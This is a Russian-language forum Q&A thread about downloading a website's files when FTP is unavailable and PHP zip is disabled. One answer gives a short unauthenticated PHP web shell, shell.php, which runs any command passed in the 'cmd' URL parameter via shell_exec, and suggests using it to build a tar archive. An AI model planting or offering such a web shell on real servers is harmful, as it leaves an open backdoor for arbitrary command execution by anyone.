@moiseev_jenia

Скачать файлы сайта с сервера с помощью php?

Нужно скачать файлы сайта. Так получилось, что ftp-доступа к файлам сайта нет. Мне удалось закачать на сервер php файл-менеджер, но это никак не помогло. Я хотел заархивировать файлы и скачать архивом, но в php zip отключен, т.е. архивация не получилась. Теперь я в тупике, не скачивать же файлы по одному, там их тысячи...
  • Вопрос задан
  • 1748 просмотров
Пригласить эксперта
Ответы на вопрос 2
webinar
@webinar Куратор тега PHP
Учим yii: https://youtu.be/-WRMlGHLgRg
Так получилось, что ftp-доступа к файлам сайта нет

Вот проблема которую надо решить, а не думать о полумерах.

Мне удалось закачать на сервер php файл-менеджер

как?

но в php zip отключен

включить можно
Ответ написан
@just_hank_moody
Через файловый менеджер заливаем shell.php
if(isset($_GET['cmd'])){
  $res = shell_exec($_GET['cmd']);
  echo $res;
}


Далее попробовать shell.php?cmd=pwd
Если функция shell_exec не отключена, то будет доступен простейшая консоль. Попробовать по кускам сделать архив через tar -czvf backup..tar.gz

Если ограничений на хостинге нет, то теоретически скрипт создаст копию и дальше ее скачать.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы